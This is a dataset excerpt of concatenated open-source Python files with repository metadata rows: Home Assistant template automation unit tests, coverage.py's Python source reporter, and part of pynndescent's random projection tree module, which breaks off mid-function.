self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
| mit | -6,312,618,687,379,220,000 | 34.327456 | 78 | 0.488414 | false |
aronsky/home-assistant | tests/components/automation/test_template.py | 2 | 14776 | """The tests for the Template automation."""
import unittest
from homeassistant.core import Context, callback
from homeassistant.setup import setup_component
import homeassistant.components.automation as automation
from tests.common import (
get_test_home_assistant, assert_setup_component, mock_component)
from tests.components.automation import common
# pylint: disable=invalid-name
class TestAutomationTemplate(unittest.TestCase):
"""Test the event automation."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, 'group')
self.hass.states.set('test.entity', 'hello')
self.calls = []
@callback
def record_call(service):
"""Record calls."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_if_fires_on_change_bool(self):
"""Test for firing on boolean change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
common.turn_off(self.hass)
self.hass.block_till_done()
self.hass.states.set('test.entity', 'planet')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_str(self):
"""Test for firing on change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'true',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_str_crazy(self):
"""Test for firing on change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'TrUE',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_not_fires_on_change_bool(self):
"""Test for not firing on boolean change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ false }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_not_fires_on_change_str(self):
"""Test for not firing on string change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'False',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_not_fires_on_change_str_crazy(self):
"""Test for not firing on string change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': 'Anything other than "true" is false.',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_no_change(self):
"""Test for firing on no change."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_two_change(self):
"""Test for firing on two changes."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ true }}',
},
'action': {
'service': 'test.automation'
}
}
})
# Trigger once
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
# Trigger again
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_with_template(self):
"""Test for firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "world") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_not_fires_on_change_with_template(self):
"""Test for not firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "hello") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 0
def test_if_fires_on_change_with_template_advanced(self):
"""Test for firing on change with template advanced."""
context = Context()
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ is_state("test.entity", "world") }}'
},
'action': {
'service': 'test.automation',
'data_template': {
'some':
'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'entity_id', 'from_state.state',
'to_state.state'))
},
}
}
})
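        # The joined string above renders as "{{ trigger.platform }} -
        # {{ trigger.entity_id }} - {{ trigger.from_state.state }} -
        # {{ trigger.to_state.state }}", matching the asserted
        # 'template - test.entity - hello - world' value below.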
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world', context=context)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
assert self.calls[0].context is context
self.assertEqual(
'template - test.entity - hello - world',
self.calls[0].data['some'])
def test_if_fires_on_no_change_with_template_advanced(self):
"""Test for firing on no change with template advanced."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '''{%- if is_state("test.entity", "world") -%}
true
{%- else -%}
false
{%- endif -%}''',
},
'action': {
'service': 'test.automation'
}
}
})
# Different state
self.hass.states.set('test.entity', 'worldz')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Different state
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_if_fires_on_change_with_template_2(self):
"""Test for firing on change with template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template':
'{{ not is_state("test.entity", "world") }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 0
self.hass.states.set('test.entity', 'home')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'work')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'not_home')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
assert len(self.calls) == 1
self.hass.states.set('test.entity', 'home')
self.hass.block_till_done()
assert len(self.calls) == 2
def test_if_action(self):
"""Test for firing if action."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': [{
'condition': 'template',
'value_template': '{{ is_state("test.entity", "world") }}'
}],
'action': {
'service': 'test.automation'
}
}
})
# Condition is not true yet
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Change condition to true, but it shouldn't be triggered yet
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# Condition is true and event is triggered
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_fires_on_change_with_bad_template(self):
"""Test for firing on change with bad template."""
with assert_setup_component(0):
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ ',
},
'action': {
'service': 'test.automation'
}
}
})
def test_if_fires_on_change_with_bad_template_2(self):
"""Test for firing on change with bad template."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template': '{{ xyz | round(0) }}',
},
'action': {
'service': 'test.automation'
}
}
})
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_wait_template_with_trigger(self):
"""Test using wait template with 'trigger.entity_id'."""
assert setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'template',
'value_template':
"{{ states.test.entity.state == 'world' }}",
},
'action': [
{'wait_template':
"{{ is_state(trigger.entity_id, 'hello') }}"},
{'service': 'test.automation',
'data_template': {
'some':
'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'entity_id', 'from_state.state',
'to_state.state'))
}}
],
}
})
self.hass.block_till_done()
self.calls = []
self.hass.states.set('test.entity', 'world')
self.hass.block_till_done()
self.hass.states.set('test.entity', 'hello')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
self.assertEqual(
'template - test.entity - hello - world',
self.calls[0].data['some'])
| apache-2.0 | -4,656,855,175,723,286,000 | 32.967816 | 84 | 0.475636 | false |
testmana2/test | DebugClients/Python3/coverage/python.py | 18 | 5728 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Python source expertise for coverage.py"""
import os.path
import zipimport
from coverage import env, files
from coverage.misc import contract, expensive, NoSource, join_regex
from coverage.parser import PythonParser
from coverage.phystokens import source_token_lines, source_encoding
from coverage.plugin import FileReporter
@contract(returns='bytes')
def read_python_source(filename):
"""Read the Python source text from `filename`.
Returns bytes.
"""
with open(filename, "rb") as f:
return f.read().replace(b"\r\n", b"\n").replace(b"\r", b"\n")
@contract(returns='unicode')
def get_python_source(filename):
"""Return the source code, as unicode."""
base, ext = os.path.splitext(filename)
if ext == ".py" and env.WINDOWS:
exts = [".py", ".pyw"]
else:
exts = [ext]
for ext in exts:
try_filename = base + ext
if os.path.exists(try_filename):
# A regular text file: open it.
source = read_python_source(try_filename)
break
# Maybe it's in a zip file?
source = get_zip_bytes(try_filename)
if source is not None:
break
else:
# Couldn't find source.
raise NoSource("No source for code: '%s'." % filename)
source = source.decode(source_encoding(source), "replace")
# Python code should always end with a line with a newline.
if source and source[-1] != '\n':
source += '\n'
return source
@contract(returns='bytes|None')
def get_zip_bytes(filename):
"""Get data from `filename` if it is a zip file path.
Returns the bytestring data read from the zip file, or None if no zip file
could be found or `filename` isn't in it. The data returned will be
an empty string if the file is empty.
"""
markers = ['.zip'+os.sep, '.egg'+os.sep]
for marker in markers:
if marker in filename:
parts = filename.split(marker)
try:
zi = zipimport.zipimporter(parts[0]+marker[:-1])
except zipimport.ZipImportError:
continue
try:
data = zi.get_data(parts[1])
except IOError:
continue
return data
return None
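# Example of the marker handling above (illustrative POSIX-style path): for
# "/path/to/lib.egg/pkg/mod.py" the filename is split on ".egg/", a
# zipimporter is opened on "/path/to/lib.egg", and "pkg/mod.py" is read from
# inside the archive; the bytes are returned exactly as stored.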
class PythonFileReporter(FileReporter):
"""Report support for a Python file."""
def __init__(self, morf, coverage=None):
self.coverage = coverage
if hasattr(morf, '__file__'):
filename = morf.__file__
else:
filename = morf
# .pyc files should always refer to a .py instead.
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
elif filename.endswith('$py.class'): # Jython
filename = filename[:-9] + ".py"
super(PythonFileReporter, self).__init__(files.canonical_filename(filename))
if hasattr(morf, '__name__'):
name = morf.__name__
name = name.replace(".", os.sep) + ".py"
else:
name = files.relative_filename(filename)
self.relname = name
self._source = None
self._parser = None
self._statements = None
self._excluded = None
def relative_filename(self):
return self.relname
@property
def parser(self):
"""Lazily create a :class:`PythonParser`."""
if self._parser is None:
self._parser = PythonParser(
filename=self.filename,
exclude=self.coverage._exclude_regex('exclude'),
)
return self._parser
@expensive
def lines(self):
"""Return the line numbers of statements in the file."""
if self._statements is None:
self._statements, self._excluded = self.parser.parse_source()
return self._statements
@expensive
def excluded_lines(self):
"""Return the line numbers of statements in the file."""
if self._excluded is None:
self._statements, self._excluded = self.parser.parse_source()
return self._excluded
def translate_lines(self, lines):
return self.parser.translate_lines(lines)
def translate_arcs(self, arcs):
return self.parser.translate_arcs(arcs)
@expensive
def no_branch_lines(self):
no_branch = self.parser.lines_matching(
join_regex(self.coverage.config.partial_list),
join_regex(self.coverage.config.partial_always_list)
)
return no_branch
@expensive
def arcs(self):
return self.parser.arcs()
@expensive
def exit_counts(self):
return self.parser.exit_counts()
@contract(returns='unicode')
def source(self):
if self._source is None:
self._source = get_python_source(self.filename)
return self._source
def should_be_python(self):
"""Does it seem like this file should contain Python?
This is used to decide if a file reported as part of the execution of
a program was really likely to have contained Python in the first
place.
"""
# Get the file extension.
_, ext = os.path.splitext(self.filename)
# Anything named *.py* should be Python.
if ext.startswith('.py'):
return True
# A file with no extension should be Python.
if not ext:
return True
# Everything else is probably not Python.
return False
def source_token_lines(self):
return source_token_lines(self.source())
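# Illustrative use only (assumes an existing coverage.Coverage object ``cov``):
#     reporter = PythonFileReporter("pkg/mod.py", coverage=cov)
#     reporter.lines()           # line numbers of executable statements
#     reporter.excluded_lines()  # lines matched by the exclude regexes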
| gpl-3.0 | -4,367,037,442,771,514,000 | 28.833333 | 84 | 0.598638 | false |
lmcinnes/pynndescent | pynndescent/rp_trees.py | 1 | 38378 | # Author: Leland McInnes <[email protected]>
#
# License: BSD 2 clause
from warnings import warn
import locale
import numpy as np
import numba
import scipy.sparse
from pynndescent.sparse import sparse_mul, sparse_diff, sparse_sum, arr_intersect
from pynndescent.utils import tau_rand_int, norm
import joblib
from collections import namedtuple
locale.setlocale(locale.LC_NUMERIC, "C")
# Used for a floating point "nearly zero" comparison
EPS = 1e-8
INT32_MIN = np.iinfo(np.int32).min + 1
INT32_MAX = np.iinfo(np.int32).max - 1
FlatTree = namedtuple(
"FlatTree", ["hyperplanes", "offsets", "children", "indices", "leaf_size"]
)
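# Layout note: a FlatTree holds one entry per tree node in each of its list
# fields.  In the typed-list form produced by make_dense_tree/make_sparse_tree
# a leaf stores children == (-1, -1) and its point indices directly, while an
# internal node stores the numbers of its two children together with the
# splitting hyperplane and offset; convert_tree_format() later repacks this
# into flat ndarrays for the numba search routines.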
dense_hyperplane_type = numba.float32[::1]
sparse_hyperplane_type = numba.float64[:, ::1]
offset_type = numba.float64
children_type = numba.typeof((np.int32(-1), np.int32(-1)))
point_indices_type = numba.int32[::1]
@numba.njit(
numba.types.Tuple(
(numba.int32[::1], numba.int32[::1], dense_hyperplane_type, offset_type)
)(numba.float32[:, ::1], numba.int32[::1], numba.int64[::1]),
locals={
"n_left": numba.uint32,
"n_right": numba.uint32,
"hyperplane_vector": numba.float32[::1],
"hyperplane_offset": numba.float32,
"margin": numba.float32,
"d": numba.uint32,
"i": numba.uint32,
"left_index": numba.uint32,
"right_index": numba.uint32,
},
fastmath=True,
nogil=True,
cache=True,
)
def angular_random_projection_split(data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from ``graph_data``, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
data: array of shape (n_samples, n_features)
The original graph_data to be split
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
dim = data.shape[1]
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_norm = norm(data[left])
right_norm = norm(data[right])
if abs(left_norm) < EPS:
left_norm = 1.0
if abs(right_norm) < EPS:
right_norm = 1.0
# Compute the normal vector to the hyperplane (the vector between
# the two points)
hyperplane_vector = np.empty(dim, dtype=np.float32)
for d in range(dim):
hyperplane_vector[d] = (data[left, d] / left_norm) - (
data[right, d] / right_norm
)
hyperplane_norm = norm(hyperplane_vector)
if abs(hyperplane_norm) < EPS:
hyperplane_norm = 1.0
for d in range(dim):
hyperplane_vector[d] = hyperplane_vector[d] / hyperplane_norm
# For each point compute the margin (project into normal vector)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = 0.0
for d in range(dim):
margin += hyperplane_vector[d] * data[indices[i], d]
if abs(margin) < EPS:
side[i] = tau_rand_int(rng_state) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
return indices_left, indices_right, hyperplane_vector, 0.0
@numba.njit(
numba.types.Tuple(
(numba.int32[::1], numba.int32[::1], dense_hyperplane_type, offset_type)
)(numba.float32[:, ::1], numba.int32[::1], numba.int64[::1]),
locals={
"n_left": numba.uint32,
"n_right": numba.uint32,
"hyperplane_vector": numba.float32[::1],
"hyperplane_offset": numba.float32,
"margin": numba.float32,
"d": numba.uint32,
"i": numba.uint32,
"left_index": numba.uint32,
"right_index": numba.uint32,
},
fastmath=True,
nogil=True,
cache=True,
)
def euclidean_random_projection_split(data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from ``graph_data``, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses euclidean distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
data: array of shape (n_samples, n_features)
The original graph_data to be split
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
dim = data.shape[1]
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
# Compute the normal vector to the hyperplane (the vector between
# the two points) and the offset from the origin
hyperplane_offset = 0.0
hyperplane_vector = np.empty(dim, dtype=np.float32)
for d in range(dim):
hyperplane_vector[d] = data[left, d] - data[right, d]
hyperplane_offset -= (
hyperplane_vector[d] * (data[left, d] + data[right, d]) / 2.0
)
# For each point compute the margin (project into normal vector, add offset)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = hyperplane_offset
for d in range(dim):
margin += hyperplane_vector[d] * data[indices[i], d]
if abs(margin) < EPS:
side[i] = abs(tau_rand_int(rng_state)) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
return indices_left, indices_right, hyperplane_vector, hyperplane_offset
@numba.njit(
fastmath=True,
nogil=True,
cache=True,
locals={
"normalized_left_data": numba.types.float32[::1],
"normalized_right_data": numba.types.float32[::1],
"hyperplane_norm": numba.types.float32,
"i": numba.types.uint32,
},
)
def sparse_angular_random_projection_split(inds, indptr, data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from a sparse graph_data set
presented in csr sparse format as inds, graph_indptr and graph_data, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
inds: array
CSR format index array of the matrix
indptr: array
CSR format index pointer array of the matrix
data: array
CSR format graph_data array of the matrix
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
# Select two random points, set the hyperplane between them
left_index = tau_rand_int(rng_state) % indices.shape[0]
right_index = tau_rand_int(rng_state) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_inds = inds[indptr[left] : indptr[left + 1]]
left_data = data[indptr[left] : indptr[left + 1]]
right_inds = inds[indptr[right] : indptr[right + 1]]
right_data = data[indptr[right] : indptr[right + 1]]
left_norm = norm(left_data)
right_norm = norm(right_data)
if abs(left_norm) < EPS:
left_norm = 1.0
if abs(right_norm) < EPS:
right_norm = 1.0
# Compute the normal vector to the hyperplane (the vector between
# the two points)
normalized_left_data = (left_data / left_norm).astype(np.float32)
normalized_right_data = (right_data / right_norm).astype(np.float32)
hyperplane_inds, hyperplane_data = sparse_diff(
left_inds, normalized_left_data, right_inds, normalized_right_data
)
hyperplane_norm = norm(hyperplane_data)
if abs(hyperplane_norm) < EPS:
hyperplane_norm = 1.0
for d in range(hyperplane_data.shape[0]):
hyperplane_data[d] = hyperplane_data[d] / hyperplane_norm
# For each point compute the margin (project into normal vector)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = 0.0
i_inds = inds[indptr[indices[i]] : indptr[indices[i] + 1]]
i_data = data[indptr[indices[i]] : indptr[indices[i] + 1]]
_, mul_data = sparse_mul(hyperplane_inds, hyperplane_data, i_inds, i_data)
for val in mul_data:
margin += val
if abs(margin) < EPS:
side[i] = tau_rand_int(rng_state) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
hyperplane = np.vstack((hyperplane_inds, hyperplane_data))
return indices_left, indices_right, hyperplane, 0.0
@numba.njit(fastmath=True, nogil=True, cache=True)
def sparse_euclidean_random_projection_split(inds, indptr, data, indices, rng_state):
"""Given a set of ``graph_indices`` for graph_data points from a sparse graph_data set
presented in csr sparse format as inds, graph_indptr and graph_data, create
a random hyperplane to split the graph_data, returning two arrays graph_indices
that fall on either side of the hyperplane. This is the basis for a
random projection tree, which simply uses this splitting recursively.
This particular split uses cosine distance to determine the hyperplane
and which side each graph_data sample falls on.
Parameters
----------
inds: array
CSR format index array of the matrix
indptr: array
CSR format index pointer array of the matrix
data: array
CSR format graph_data array of the matrix
indices: array of shape (tree_node_size,)
The graph_indices of the elements in the ``graph_data`` array that are to
be split in the current operation.
rng_state: array of int64, shape (3,)
The internal state of the rng
Returns
-------
indices_left: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
indices_right: array
The elements of ``graph_indices`` that fall on the "left" side of the
random hyperplane.
"""
# Select two random points, set the hyperplane between them
left_index = np.abs(tau_rand_int(rng_state)) % indices.shape[0]
right_index = np.abs(tau_rand_int(rng_state)) % indices.shape[0]
right_index += left_index == right_index
right_index = right_index % indices.shape[0]
left = indices[left_index]
right = indices[right_index]
left_inds = inds[indptr[left] : indptr[left + 1]]
left_data = data[indptr[left] : indptr[left + 1]]
right_inds = inds[indptr[right] : indptr[right + 1]]
right_data = data[indptr[right] : indptr[right + 1]]
# Compute the normal vector to the hyperplane (the vector between
# the two points) and the offset from the origin
hyperplane_offset = 0.0
hyperplane_inds, hyperplane_data = sparse_diff(
left_inds, left_data, right_inds, right_data
)
offset_inds, offset_data = sparse_sum(left_inds, left_data, right_inds, right_data)
offset_data = offset_data / 2.0
offset_inds, offset_data = sparse_mul(
hyperplane_inds, hyperplane_data, offset_inds, offset_data.astype(np.float32)
)
for val in offset_data:
hyperplane_offset -= val
# For each point compute the margin (project into normal vector, add offset)
# If we are on lower side of the hyperplane put in one pile, otherwise
# put it in the other pile (if we hit hyperplane on the nose, flip a coin)
n_left = 0
n_right = 0
side = np.empty(indices.shape[0], np.int8)
for i in range(indices.shape[0]):
margin = hyperplane_offset
i_inds = inds[indptr[indices[i]] : indptr[indices[i] + 1]]
i_data = data[indptr[indices[i]] : indptr[indices[i] + 1]]
_, mul_data = sparse_mul(hyperplane_inds, hyperplane_data, i_inds, i_data)
for val in mul_data:
margin += val
if abs(margin) < EPS:
side[i] = abs(tau_rand_int(rng_state)) % 2
if side[i] == 0:
n_left += 1
else:
n_right += 1
elif margin > 0:
side[i] = 0
n_left += 1
else:
side[i] = 1
n_right += 1
# Now that we have the counts allocate arrays
indices_left = np.empty(n_left, dtype=np.int32)
indices_right = np.empty(n_right, dtype=np.int32)
# Populate the arrays with graph_indices according to which side they fell on
n_left = 0
n_right = 0
for i in range(side.shape[0]):
if side[i] == 0:
indices_left[n_left] = indices[i]
n_left += 1
else:
indices_right[n_right] = indices[i]
n_right += 1
hyperplane = np.vstack((hyperplane_inds, hyperplane_data))
return indices_left, indices_right, hyperplane, hyperplane_offset
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_euclidean_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = euclidean_random_projection_split(data, indices, rng_state)
make_euclidean_tree(
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_euclidean_tree(
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([-1.0], dtype=np.float32))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={
"children": numba.types.ListType(children_type),
"left_node_num": numba.types.int32,
"right_node_num": numba.types.int32,
},
)
def make_angular_tree(
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = angular_random_projection_split(data, indices, rng_state)
make_angular_tree(
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_angular_tree(
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([-1.0], dtype=np.float32))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_sparse_euclidean_tree(
inds,
indptr,
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
left_indices,
right_indices,
hyperplane,
offset,
) = sparse_euclidean_random_projection_split(
inds, indptr, data, indices, rng_state
)
make_sparse_euclidean_tree(
inds,
indptr,
data,
left_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
left_node_num = len(point_indices) - 1
make_sparse_euclidean_tree(
inds,
indptr,
data,
right_indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size,
)
right_node_num = len(point_indices) - 1
hyperplanes.append(hyperplane)
offsets.append(offset)
children.append((np.int32(left_node_num), np.int32(right_node_num)))
point_indices.append(np.array([-1], dtype=np.int32))
else:
hyperplanes.append(np.array([[-1.0], [-1.0]], dtype=np.float64))
offsets.append(-np.inf)
children.append((np.int32(-1), np.int32(-1)))
point_indices.append(indices)
return
@numba.njit(
nogil=True,
cache=True,
locals={"left_node_num": numba.types.int32, "right_node_num": numba.types.int32},
)
def make_sparse_angular_tree(
inds,
indptr,
data,
indices,
hyperplanes,
offsets,
children,
point_indices,
rng_state,
leaf_size=30,
):
if indices.shape[0] > leaf_size:
(
